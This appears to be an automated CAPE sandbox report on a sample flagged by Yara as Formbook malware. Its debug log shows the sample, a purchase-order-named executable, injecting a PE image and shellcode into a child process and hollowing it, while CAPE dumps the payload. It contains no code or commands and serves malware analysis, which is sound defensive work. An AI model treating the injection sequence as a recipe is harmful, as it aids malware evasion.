Detections

Yara:

Formbook

Auto Tasks

#17822: Unpacker

Analysis

Category FILE
Package exe
Started 2020-06-30 13:54:16
Completed 2020-06-30 13:59:30
Duration 314 seconds
Options route = tor
2020-05-13 09:09:47,540 [root] INFO: Date set to: 20200630T13:47:48, timeout set to: 200
2020-06-30 13:47:48,078 [root] DEBUG: Starting analyzer from: C:\tmp2ylp3rhi
2020-06-30 13:47:48,078 [root] DEBUG: Storing results at: C:\YCyAWu
2020-06-30 13:47:48,078 [root] DEBUG: Pipe server name: \\.\PIPE\OVTzIXq
2020-06-30 13:47:48,078 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-06-30 13:47:48,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-30 13:47:48,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-30 13:47:48,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-30 13:47:48,093 [root] DEBUG: Imported analysis package "exe".
2020-06-30 13:47:48,093 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-30 13:47:48,093 [root] DEBUG: Initialized analysis package "exe".
2020-06-30 13:47:48,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-30 13:47:48,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-30 13:47:48,203 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-30 13:47:48,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-30 13:47:48,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-30 13:47:48,265 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-30 13:47:48,265 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-30 13:47:48,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-30 13:47:48,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-30 13:47:48,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-30 13:47:48,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-30 13:47:48,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-30 13:47:48,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-30 13:47:48,312 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-30 13:47:48,312 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-30 13:47:48,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-30 13:47:50,265 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-30 13:47:50,281 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-30 13:47:50,343 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-30 13:47:50,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-30 13:47:50,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-30 13:47:50,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-30 13:47:50,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-30 13:47:50,390 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-30 13:47:50,390 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-30 13:47:50,390 [root] DEBUG: Started auxiliary module Browser
2020-06-30 13:47:50,390 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-30 13:47:50,390 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-30 13:47:50,390 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-30 13:47:50,406 [root] DEBUG: Started auxiliary module Curtain
2020-06-30 13:47:50,406 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-30 13:47:50,406 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-30 13:47:50,406 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-30 13:47:50,406 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-30 13:47:50,921 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-30 13:47:50,921 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-30 13:47:50,937 [root] DEBUG: Started auxiliary module DigiSig
2020-06-30 13:47:50,937 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-30 13:47:50,937 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-30 13:47:50,937 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-30 13:47:50,953 [root] DEBUG: Started auxiliary module Disguise
2020-06-30 13:47:50,953 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-30 13:47:50,953 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-30 13:47:50,953 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-30 13:47:50,953 [root] DEBUG: Started auxiliary module Human
2020-06-30 13:47:50,953 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Procmon
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Screenshots
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Sysmon
2020-06-30 13:47:50,968 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-30 13:47:50,968 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-30 13:47:50,968 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-30 13:47:50,968 [root] DEBUG: Started auxiliary module Usage
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-30 13:47:50,968 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-30 13:47:51,046 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe" with arguments "" with pid 4460
2020-06-30 13:47:51,046 [lib.api.process] INFO: Monitor config for process 4460: C:\tmp2ylp3rhi\dll\4460.ini
2020-06-30 13:47:51,046 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:47:51,140 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:47:51,140 [root] DEBUG: Loader: Injecting process 4460 (thread 5936) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:47:51,140 [root] DEBUG: Process image base: 0x00E10000
2020-06-30 13:47:51,140 [root] DEBUG: InjectDllViaIAT: Executable is .NET, injecting via queued APC.
2020-06-30 13:47:51,140 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.
2020-06-30 13:47:51,140 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:47:51,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4460
2020-06-30 13:47:53,156 [lib.api.process] INFO: Successfully resumed process with pid 4460
2020-06-30 13:47:54,187 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:47:54,187 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:47:54,203 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4460 at 0x6ac70000, image base 0xe10000, stack from 0x315000-0x320000
2020-06-30 13:47:54,203 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe".
2020-06-30 13:47:54,203 [root] INFO: Loaded monitor into process with pid 4460
2020-06-30 13:47:54,218 [root] DEBUG: set_caller_info: Adding region at 0x00220000 to caller regions list (advapi32::RegQueryInfoKeyW).
2020-06-30 13:47:54,218 [root] DEBUG: set_caller_info: Adding region at 0x00830000 to caller regions list (ntdll::RtlDispatchException).
2020-06-30 13:47:54,249 [root] DEBUG: DLL loaded at 0x751E0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-30 13:47:54,249 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x830000
2020-06-30 13:47:54,249 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x00830000 size 0x400000.
2020-06-30 13:47:54,249 [root] DEBUG: DumpPEsInRange: Scanning range 0x830000 - 0x831000.
2020-06-30 13:47:54,265 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x830000-0x831000.
2020-06-30 13:47:54,296 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_69581700154472030262020 (size 0xffe)
2020-06-30 13:47:54,296 [root] DEBUG: DumpRegion: Dumped stack region from 0x00830000, size 0x1000.
2020-06-30 13:47:54,296 [root] DEBUG: set_caller_info: Failed to dumping calling PE image at 0x00220000.
2020-06-30 13:47:54,312 [root] DEBUG: set_caller_info: Adding region at 0x004F0000 to caller regions list (kernel32::FindFirstFileExW).
2020-06-30 13:47:54,421 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x5effff
2020-06-30 13:47:54,421 [root] DEBUG: DumpMemory: Nothing to dump at 0x004F0000!
2020-06-30 13:47:54,421 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x004F0000 size 0x100000.
2020-06-30 13:47:54,421 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x51d000.
2020-06-30 13:47:54,421 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x51d000.
2020-06-30 13:47:54,453 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_139228523454472030262020 (size 0x2cffe)
2020-06-30 13:47:54,453 [root] DEBUG: DumpRegion: Dumped stack region from 0x004F0000, size 0x2d000.
2020-06-30 13:47:54,468 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x6B910000 to global list.
2020-06-30 13:47:54,468 [root] DEBUG: DLL loaded at 0x6B910000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7d000 bytes).
2020-06-30 13:47:54,468 [root] DEBUG: DLL unloaded from 0x76560000.
2020-06-30 13:47:54,484 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd4 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,500 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,500 [root] DEBUG: DLL loaded at 0x74760000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-30 13:47:54,515 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x0FE60000 for section view with handle 0xd4.
2020-06-30 13:47:54,531 [root] DEBUG: DLL loaded at 0x0FE60000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr (0x6ef000 bytes).
2020-06-30 13:47:54,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x6E2C0000 for section view with handle 0xd4.
2020-06-30 13:47:54,531 [root] DEBUG: DLL loaded at 0x6E2C0000: C:\Windows\system32\MSVCR120_CLR0400 (0xf5000 bytes).
2020-06-30 13:47:54,546 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 4460, handle 0xf4.
2020-06-30 13:47:54,562 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x00100000 to global list.
2020-06-30 13:47:54,562 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xfc amd local view 0x00110000 to global list.
2020-06-30 13:47:54,562 [root] INFO: Disabling sleep skipping.
2020-06-30 13:47:54,562 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,578 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,593 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4460.
2020-06-30 13:47:54,609 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x1e4 amd local view 0x05B80000 to global list.
2020-06-30 13:47:54,656 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x1f0 amd local view 0x65320000 to global list.
2020-06-30 13:47:54,656 [root] DEBUG: DLL loaded at 0x65320000: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni (0x1393000 bytes).
2020-06-30 13:47:54,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x204 amd local view 0x6ABF0000 to global list.
2020-06-30 13:47:54,687 [root] DEBUG: DLL loaded at 0x6ABF0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit (0x80000 bytes).
2020-06-30 13:47:54,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x200 amd local view 0x763D0000 to global list.
2020-06-30 13:47:54,687 [root] DEBUG: DLL loaded at 0x763D0000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-06-30 13:47:54,734 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x218 amd local view 0x68180000 to global list.
2020-06-30 13:47:54,750 [root] DEBUG: DLL loaded at 0x68180000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni (0xa10000 bytes).
2020-06-30 13:47:54,765 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x68EF0000 for section view with handle 0x218.
2020-06-30 13:47:54,765 [root] DEBUG: DLL loaded at 0x68EF0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni (0x194000 bytes).
2020-06-30 13:47:54,781 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x214 amd local view 0x64600000 to global list.
2020-06-30 13:47:54,781 [root] DEBUG: DLL loaded at 0x64600000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni (0xd1d000 bytes).
2020-06-30 13:47:54,843 [root] DEBUG: set_caller_info: Adding region at 0x001A0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-06-30 13:47:54,859 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x1affff
2020-06-30 13:47:54,859 [root] DEBUG: DumpMemory: Nothing to dump at 0x001A0000!
2020-06-30 13:47:54,859 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x001A0000 size 0x10000.
2020-06-30 13:47:54,859 [root] DEBUG: DumpPEsInRange: Scanning range 0x1a0000 - 0x1a1000.
2020-06-30 13:47:54,859 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1a0000-0x1a1000.
2020-06-30 13:47:54,890 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_38252076014482030262020 (size 0x52d)
2020-06-30 13:47:54,890 [root] DEBUG: DumpRegion: Dumped stack region from 0x001A0000, size 0x1000.
2020-06-30 13:47:54,906 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\uxtheme (0x40000 bytes).
2020-06-30 13:47:54,937 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x224 amd local view 0x67490000 to global list.
2020-06-30 13:47:55,125 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x22c amd local view 0x02A70000 to global list.
2020-06-30 13:47:55,249 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x001E0000 for section view with handle 0x22c.
2020-06-30 13:48:05,421 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x230 amd local view 0x73BE0000 to global list.
2020-06-30 13:48:05,453 [root] DEBUG: DLL loaded at 0x73BE0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\gdiplus (0x192000 bytes).
2020-06-30 13:48:05,468 [root] DEBUG: set_caller_info: Adding region at 0x00130000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-06-30 13:48:05,468 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x13ffff
2020-06-30 13:48:05,468 [root] DEBUG: DumpMemory: Nothing to dump at 0x00130000!
2020-06-30 13:48:05,484 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x00130000 size 0x10000.
2020-06-30 13:48:05,484 [root] DEBUG: DumpPEsInRange: Scanning range 0x130000 - 0x131000.
2020-06-30 13:48:05,484 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x130000-0x131000.
2020-06-30 13:48:05,515 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_148311835648482030262020 (size 0x14)
2020-06-30 13:48:05,515 [root] DEBUG: DLL loaded at 0x73480000: C:\Windows\system32\WindowsCodecs (0x131000 bytes).
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x240 amd local view 0x00C30000 to global list.
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x00C40000 for section view with handle 0x240.
2020-06-30 13:48:05,531 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x00C50000 for section view with handle 0x240.
2020-06-30 13:48:05,781 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x250 amd local view 0x63E20000 to global list.
2020-06-30 13:48:05,781 [root] DEBUG: DLL loaded at 0x63E20000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni (0x7e0000 bytes).
2020-06-30 13:48:05,796 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x24c amd local view 0x67FA0000 to global list.
2020-06-30 13:48:05,859 [root] DEBUG: DLL loaded at 0x67FA0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni (0x1d1000 bytes).
2020-06-30 13:48:05,921 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x248 amd local view 0x72900000 to global list.
2020-06-30 13:48:05,921 [root] DEBUG: DLL loaded at 0x72900000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting (0x13000 bytes).
2020-06-30 13:48:05,921 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x06240000 for section view with handle 0x248.
2020-06-30 13:48:05,953 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x244 amd local view 0x00DD0000 to global list.
2020-06-30 13:48:06,609 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,609 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,609 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,640 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,640 [root] DEBUG: Loader: Injecting process 4740 (thread 4708) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,640 [root] DEBUG: Process image base: 0x00E10000
2020-06-30 13:48:06,640 [root] DEBUG: InjectDllViaIAT: Executable is .NET, injecting via queued APC.
2020-06-30 13:48:06,656 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.
2020-06-30 13:48:06,656 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,656 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-30 13:48:06,656 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-06-30 13:48:06,687 [root] DEBUG: CreateProcessHandler: Injection info set for new process 4740, ImageBase: 0x00E10000
2020-06-30 13:48:06,703 [root] DEBUG: WriteMemoryHandler: Executable binary injected into process 4740 (ImageBase 0x400000)
2020-06-30 13:48:06,703 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-30 13:48:06,734 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0x27000.
2020-06-30 13:48:06,734 [root] DEBUG: WriteMemoryHandler: Dumped PE image from buffer at 0x4ac0108, SizeOfImage 0x27000.
2020-06-30 13:48:06,750 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,750 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,765 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,781 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,781 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,781 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,781 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,796 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,796 [root] DEBUG: WriteMemoryHandler: shellcode at 0x04AE7328 (size 0x26000) injected into process 4740.
2020-06-30 13:48:06,828 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4460_91607809649482030262020 (size 0x25efe)
2020-06-30 13:48:06,828 [root] DEBUG: WriteMemoryHandler: Dumped injected code/data from buffer.
2020-06-30 13:48:06,828 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,828 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,843 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,843 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,859 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,859 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,859 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,859 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,859 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,875 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,875 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,890 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,890 [root] DEBUG: Loader: Injecting process 4740 (thread 0) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,890 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-30 13:48:06,890 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-30 13:48:06,890 [root] DEBUG: Failed to inject DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,906 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 4740, error: 4294967281
2020-06-30 13:48:06,906 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x0001C160 (process 4740).
2020-06-30 13:48:06,906 [root] INFO: Announced 32-bit process name: PO8397234.exe pid: 4740
2020-06-30 13:48:06,906 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ylp3rhi\dll\4740.ini
2020-06-30 13:48:06,906 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ylp3rhi\dll\mwMhyAcm.dll, loader C:\tmp2ylp3rhi\bin\dAcTiYh.exe
2020-06-30 13:48:06,953 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OVTzIXq.
2020-06-30 13:48:06,968 [root] DEBUG: Loader: Injecting process 4740 (thread 4708) with C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,968 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:48:06,968 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:06,984 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:48:06,984 [root] DEBUG: Successfully injected DLL C:\tmp2ylp3rhi\dll\mwMhyAcm.dll.
2020-06-30 13:48:07,015 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-30 13:48:07,015 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 4740.
2020-06-30 13:48:07,031 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:48:07,031 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:48:07,046 [root] INFO: Disabling sleep skipping.
2020-06-30 13:48:07,046 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:48:07,046 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4740 at 0x6ac70000, image base 0x400000, stack from 0x246000-0x250000
2020-06-30 13:48:07,046 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"{path}".
2020-06-30 13:48:07,062 [root] INFO: Loaded monitor into process with pid 4740
2020-06-30 13:48:07,062 [root] DEBUG: set_caller_info: Adding region at 0x00030000 to caller regions list (ntdll::LdrLoadDll).
2020-06-30 13:48:07,062 [root] DEBUG: set_caller_info: Adding region at 0x008F0000 to caller regions list (kernel32::GetSystemTime).
2020-06-30 13:48:07,062 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x751E0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x8f0000
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-30 13:48:07,078 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x008F0000 size 0x400000.
2020-06-30 13:48:07,078 [root] DEBUG: DumpPEsInRange: Scanning range 0x8f0000 - 0x8f1000.
2020-06-30 13:48:07,078 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8f0000-0x8f1000.
2020-06-30 13:48:07,078 [root] DEBUG: DLL loaded at 0x75280000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-30 13:48:07,093 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4460
2020-06-30 13:48:07,093 [root] DEBUG: GetHookCallerBase: thread 5936 (handle 0x0), return address 0x001A21B9, allocation base 0x001A0000.
